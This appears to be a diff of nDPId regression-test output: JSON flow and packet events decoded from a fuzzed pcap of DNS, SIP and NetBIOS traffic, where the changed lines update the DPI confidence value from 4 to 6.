00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1120469921898,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469921898,"pkt":"ADBUADRWAODtAW69CABFAABIajUAAIARTRzAqAECwKgBAQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1120469922894,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469922894,"pkt":"ADBUADRWAODtAW69CABFAABIJXMAAIARTRvAqAECwKgBAQp8ADUANK14fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJRHliZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469924456} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469923705,"pkt":"\/\/\/\/\/\/\/\/AODtAW69qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1120469924897,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469924897,"pkt":"ADBUADRWAODtAW69CABFAABIajoAAIARTRfAqAECwKgBEQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1120469926899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469926899,"pkt":"QDBUADRWAODtAW69CABFAABIaj0AAIARTRTAqAECwKgBAQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1120469930905,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469930905,"pkt":"ADBUADRWAODtAW69CABFAABIaj4AAIARTRPAqAECwKgBAQqwADUANK04fNwBAACBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1120469540839,"flow_last_seen":1120469923705,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1000,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1120469540839,"flow_last_seen":1120469923705,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1000,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1120469938907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469938907,"pkt":"ADBUADRWAODtAW69CABFAABEaj8AAIARTRbAqAECwKgBAQqxADUAMAoxGt0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1120469938908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469938908,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAF8Rtz7AqAEBwKgBAgA1CrEAR+ysGt2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAVgwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469938908,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469938908,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1120469938910,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469938910,"pkt":"ADBUADRWAODtAW69CABFAAHvakAAAIARFv7AqAEC1PIhI1HEE8QB28mlUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTE0NjM5MDAwLTQ3N2U3NTkxMTkyLjE2OC4xLjI7JXMAcnQNCkZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5k9T47dGFnPTZkNTQwYTUNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHlzZGs+DQpDYWxuLUlEOiA1NzgyVDI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2MkAxOTIuMTY4LjEuMjo1MDYwO2xpbmU9YWNhNmI5N2NhM2Y1MTUxYT47ZXhwaXJlcx0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANe0NTZXE6IDc0IFLPR0lTVEVSDQpDb250ZUF0LUxlbmd0aDogMA0KTWF4LUZvcglhcmRzOiA3MA0KaXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNl8KDQo="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1120469939223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469939223,"pkt":"ADBUADRWAODtAW69CABFAABIakEAAIARTRDAqAECwKhUAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR1AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercitu.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercitu.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 